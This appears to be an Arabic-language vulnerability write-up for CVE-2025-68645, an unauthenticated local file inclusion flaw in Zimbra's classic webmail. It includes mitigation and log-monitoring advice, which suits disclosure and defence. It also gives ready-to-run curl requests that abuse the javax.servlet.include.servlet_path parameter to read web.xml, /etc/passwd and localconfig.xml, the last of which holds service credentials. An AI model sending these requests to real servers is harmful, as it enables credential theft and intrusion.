📌 نظرة عامة
يصف هذا المستند ثغرة تضمين الملفات المحلية (LFI) التي تؤثر على Zimbra Collaboration Suite.
تنشأ المشكلة بسبب معالجة غير صحيحة للمعامل التالي:
/h/*?javax.servlet.include.servlet_path=
يسمح ذلك لمستخدم غير مصادق بالوصول إلى موارد التطبيق الداخلية.
🔍 تفاصيل الثغرة
- النوع: تضمين الملفات المحلية (LFI)
- الوصول: غير مصادق
- المكون المتأثر: Webmail (الواجهة الكلاسيكية)
- ناقل الهجوم: التلاعب بطلبات HTTP
🧪 التحقق الأولي
طلب الاختبار:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
▶️ العرض التوضيحي:
✅ النتيجة
- تم استرجاع الملف الداخلي بنجاح
- يؤكد سوء معالجة الإدخال
⚙️ سلوك نقطة النهاية
تتعامل نقاط النهاية المتعددة مع المعامل الضعيف بشكل مختلف.
مثال:
/h/printcalendar?javax.servlet.include.servlet_path=...
ملاحظات:
- سلوك وصول أكثر اتساقًا للملفات
- موثوقية استجابة أفضل مقارنة بـ
/h/rest
🚧 اعتبارات TLS
المشكلة
SSL: certificate subject name does not match target host
الحل البديل
curl -k "https://TARGET/..."
🚀 أمثلة الاستغلال
📂 الوصول إلى مورد ويب داخلي
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
📂 محاولة الوصول إلى ملف النظام
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
🔐 الوصول إلى إعدادات التطبيق
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
التعرض المحتمل:
- بيانات اعتماد الخدمة
- الإعدادات الداخلية
- تفاصيل البنية التحتية
🧠 التأثير
قد يؤدي الاستغلال الناجح إلى:
- الكشف عن ملفات الإعدادات الحساسة
- كشف الخدمات والبنية الداخلية
- تسرب بيانات الاعتماد
- زيادة خطر الاختراق الإضافي
🛡️ التخفيف
- تحديث Zimbra إلى الإصدارات المصححة
- تقييد الوصول إلى نقاط النهاية الضعيفة
- مراقبة السجلات بحثًا عن معاملات مشبوهة:
javax.servlet.include.servlet_path
- نشر قواعد جدار حماية تطبيقات الويب (WAF) لمنع الأنماط الخبيثة
💡 الوجبات الرئيسية
- يمكن أن تؤدي فشل التحقق من الإدخال إلى كشف الموارد الداخلية
- قد تتصرف نقاط النهاية المختلفة بشكل غير متسق
- غالبًا ما تحتوي ملفات الإعدادات على معلومات حساسة
- الكشف المبكر يقلل المخاطر بشكل كبير
🏴 الخلاصة
- الثغرة مؤكدة: CVE-2025-68645
- الاستغلال يسمح بالوصول غير المصرح به للملفات
- يوصى بشدة بالمعالجة الفورية
🔐 الأمان مهم